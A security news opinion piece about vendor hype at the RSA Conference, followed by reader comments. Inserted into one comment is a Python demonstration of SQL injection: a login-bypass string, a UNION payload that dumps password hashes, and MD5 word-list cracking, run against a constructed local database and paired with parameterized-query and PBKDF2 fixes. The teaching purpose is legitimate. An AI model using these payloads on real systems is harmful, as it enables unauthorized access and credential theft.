SAN FRANCISCO–It’s often said that after decades of work and technological advances, the security industry hasn’t actually solved any problems or made things any better. But that’s not entirely true. The industry has in fact perfected the art of exploiting the scare ’em and snare ’em, threat-of-the-moment mentality that’s turned security into a perpetual cash-generation machine. And it’s all for naught.

Nowhere is the state of this art clearer or on more flagrant display than at the RSA Conference here every year, a week-long industry love-in during which thousands of sales and marketing executives descend upon the city to mingle with dozens of actual security professionals. The agenda for the week is clear: Hammer home the fact that your product protects enterprises against <insert threat here>. The flavor of the week this time around was Stuxnet/Aurora/Iran/China/terrifying professional adversary.

For the most part, the idea that Product A, which was designed to address Threat A seven years ago, is now being touted as a perfect countermeasure to Threat B is treated as a harmless joke in the industry. Everyone does it. Threats come and go, so companies that want to stick around need to adapt. The threat from professional or state-sponsored attackers using super-sophisticated custom malware to compromise government agencies, banks, Google, nuclear plants and other high-profile targets is simply the latest iteration of that.

But the problem with this evolution is that attacks such as Stuxnet or Operation Aurora or GhostNet are not what most enterprises and organizations need to be worried about. The plain fact is that most organizations are falling far short in protecting against the same threats that they’ve faced for the last 10 years. SQL injection, phishing, malicious attachments, social engineering. Old, every one of them. And yet, still incredibly effective at compromising networks in some of the best-known and theoretically best-protected companies.

In other words, Stuxnet and Aurora have been owning networks around the world, without ever touching them.

Security researcher Michal Zalewski points out that all of the discussion in recent months of these highly targeted attacks has obscured the fact that this kind of attack not only is nothing new, it’s not even worth worrying about for most organizations.

“It is tempting to frame the constant stream of high-profile failures as a proof for the evolution of your adversary. But when you realize that almost every single large institution can probably be compromised by a moderately skilled attacker, this explanation just does not ring true. The inability to solve this increasingly pressing problem is no reason to celebrate – and even less of a reason to push for preposterous, unnecessary spending on silly intelligence services, or to promote overreaching and ill-defined regulation. If anything, it is a reason to reflect on our mistakes and perhaps go back to the drawing board,” Zalewski wrote in a blog post recently.

His point is well made. And while it may be tempting to dismiss this line of thinking as just a thought exercise or hair-splitting about who the attackers are, that would be a mistake. Focusing on shadowy, highly funded and motivated attackers that may be targeting your organization can divert your resources and personnel away from the less sexy and headline-worthy attackers who most definitely are targeting you.

The script kiddies that were defacing web sites and playing DDoS tag 10 years ago didn’t go away; they moved on to more profitable activities such as spear phishing and planting malware on your home page to exploit visitors. Doesn’t sound serious? Keep in mind that many of the victims of Operation Aurora were compromised through malicious PDFs attached to emails. None of these attacks is a joke and if you’re compromised, you don’t much care who did it in many cases. You just care that you’re owned.

But it’s important to remember when trying to discern the signal from the noise that determined attackers have always existed and they’ve always had the advantage. That’s not likely to change anytime soon, regardless of what scary mask they may be wearing at the moment or may don in the future.

Categories: Government, Vulnerabilities, Web Security

Comments (9)

  1. Anonymous

    At what point are we going to get back to focusing on people, process and how we leverage technology to secure data and systems rather than looking at technology as the solution? We as companies and individuals have gotten lazy and don’t want to put in the hard work necessary to be successful. We are looking for the “magic” pill to make us “thin” rather than focusing on the real issue. After all, isn’t this really Information Security and not technology security (IT)?!

  2. Anonymous

    “But the problem with this evolution is that attacks such as Stuxnet or Operation Aurora or GhostNet are not what most enterprises and organizations need to be worried about.”

    So, the lesson of Stuxnet is, Stuxnet is not the lesson we need to be learning.

    Wait, what?

  3. Anonymous

    It seems to me that even the so called “high-tech” malware still relies mostly on a user voluntarily doing something to activate the malware, such as inserting an infected USB drive in a computer, clicking on an unknown link, or downloading an unknown file.

    Perhaps the failure is due to the user, and perhaps the security/AV industry has done its job.  It is an impossible task to make someone be a safe user/surfer/employee.

  4. Anonymous

    How about this as an example of the state of security: a security company selling “cutting edge” solutions to the NSA, CIA and global corporations gets hacked using basic SQL injection in a CMS to grab the password hashes; poor password encryption allows the passwords to be cracked, and then password reuse and some social engineering allow the entire company to be owned.


    Peter ::
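The chain Peter describes above (string-built SQL in a CMS login, a UNION payload that dumps the users table, unsalted hashes that fall to a word list) is short enough to show end to end. The following is an added example, not code from the post or from any vendor mentioned in the thread; the `users` table, the accounts, their passwords, the word list and the function names (`login_vulnerable`, `login_parameterized`, `dump_hashes_via_injection`, `hash_pbkdf2`) are all constructed for illustration.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample data: a CMS users table holding passwords as
# unsalted MD5, the kind of "poor password encryption" the comment
# refers to. Accounts and passwords are invented for this example.
USERS = [("admin", "welcome1"), ("editor", "Summer2011")]

# Constructed word list standing in for a real cracking dictionary.
WORDLIST = ["password", "123456", "welcome1", "Summer2011", "letmein"]


def build_db():
    """In-memory SQLite database seeded with the constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    for name, pw in USERS:
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (name, hashlib.md5(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check that splices user input straight into the SQL text.
    Anything the attacker types in `username` is parsed as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND pw_hash = '%s'" % (username, pw_hash))
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Same check with bound parameters: the input stays data."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash))
    return [row[0] for row in rows]


def dump_hashes_via_injection(conn):
    """Step one of the chain: a UNION payload in the username field turns
    the login query into a dump of every username:hash pair. The `--`
    comments out the rest of the original WHERE clause."""
    payload = "x' UNION SELECT username || ':' || pw_hash FROM users --"
    rows = login_vulnerable(conn, payload, "irrelevant")
    return dict(row.split(":", 1) for row in rows)


def crack_md5(pw_hash, wordlist=WORDLIST):
    """Step two: unsalted MD5 is one hash call per guess, so a word list
    recovers weak passwords in no time."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == pw_hash:
            return word
    return None


def hash_pbkdf2(password, salt=None, iterations=200_000):
    """What the CMS should have stored: a per-user random salt and a slow,
    iterated hash, so each guess costs the attacker `iterations` rounds
    and a single crack cannot be reused across accounts."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_pbkdf2(stored, password):
    """Constant-time comparison against a stored PBKDF2 record."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    db = build_db()
    print("bypass:", login_vulnerable(db, "admin' --", "wrong"))
    print("same input, parameterized:", login_parameterized(db, "admin' --", "wrong"))
    dumped = dump_hashes_via_injection(db)
    for user, h in dumped.items():
        print(user, h, "->", crack_md5(h))
    record = hash_pbkdf2("welcome1")
    print("pbkdf2 verify:", verify_pbkdf2(record, "welcome1"))
```

The two fixes are independent and both are needed: parameterized queries close the dump, and salted iterated hashing means a dump obtained some other way (backup, insider, a second bug) does not hand over reusable passwords. The password-reuse step in the chain has no code fix at all, which is the point the comment is making.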

  5. Anonymous

    If only, for the average company, there was money in computer security! Fact is that your average company can spend as much time and money as it wants on security and still be vulnerable to a determined attack.

    I would posit that the majority of sysadmins are stretched way too thin to dedicate their time and effort to properly securing their systems. Instead they rely on AV on the desktops and mail servers, and some sort of firewall product.

    Even if the average company does invest in ‘the best security specialists EVA!’, the best that this team can hope to show is that the network wasn’t penetrated. I.e., nothing happened. Which makes the bean counters beg the question: Why are we paying you?

    And then there’s the fact that most security incidents go unnoticed for months, possibly years. Which equates to the aforementioned security team is only able to honestly say “we THINK the network wasn’t penetrated”.

    I’ve been in a situation to analyze network security for a number of organizations, from government departments, through to smaller private companies. And, for example, when I’ve asked – why are these systems so badly out of date? I hear lots of excuses:

    – They’re behind a firewall
    – They’re on NAT so can’t be contacted from outside
    – Our company isn’t really a valid target – no one out there is interested in our data
    – Five years ago we applied patch x to software y and it broke our main business app – so we don’t patch anymore unless we absolutely have to

    What these guys are really saying is: I’m way too busy to give this the attention it deserves.

    Security especially and IT generally are a business expense. The executives and bean counters are not asking “how do I make my systems secure?”. Rather their attitude is: IT is an expense that eats my profit margin, so how little can I spend to maintain it and how do I avoid being charged with criminal negligence in the event of a breach?

    I’m sure there’s a lesson in that somewhere…. 

  6. Anonymous

    I agree with anonymous. Also, the real problem is with people, not with the technology. Information is only protected when it is impossible for people to access it. Remove people from the equation, problem solved. On the other hand, make all information public, that works too.

  7. Anonymous

    Agreed, most of the problem with security is the unknown of the user. One can only teach what the users care to know. Network security is of no matter to them. How many times have you sat through the same informational piece stating not to click on links, don’t install ‘X’, or to simply look at what you are doing?

    Most attacks can be achieved through social engineering leading to malware installs.

    The security teams can only do so much locking down a network when joe-blow likes going to pron sites all day.

  8. Anonymous

    Several of the presentations at RSA made the same argument, as well as at BSides. Nice to see you echo them here, but strange that you don’t mention any.

    You make it seem like RSA is one-sided and vendor-centric, but that’s hardly true. Presentations (outside of the for-profit Cloud Security Alliance) are not allowed to give pitches. The conference reviewers will pull any presentation material they see as a product “hammer”.

    Also, your write-up, and Zalewski’s, would benefit from differentiating between a view of threats and vulnerabilities. It also would benefit from mentioning asset value when speaking of compromises.
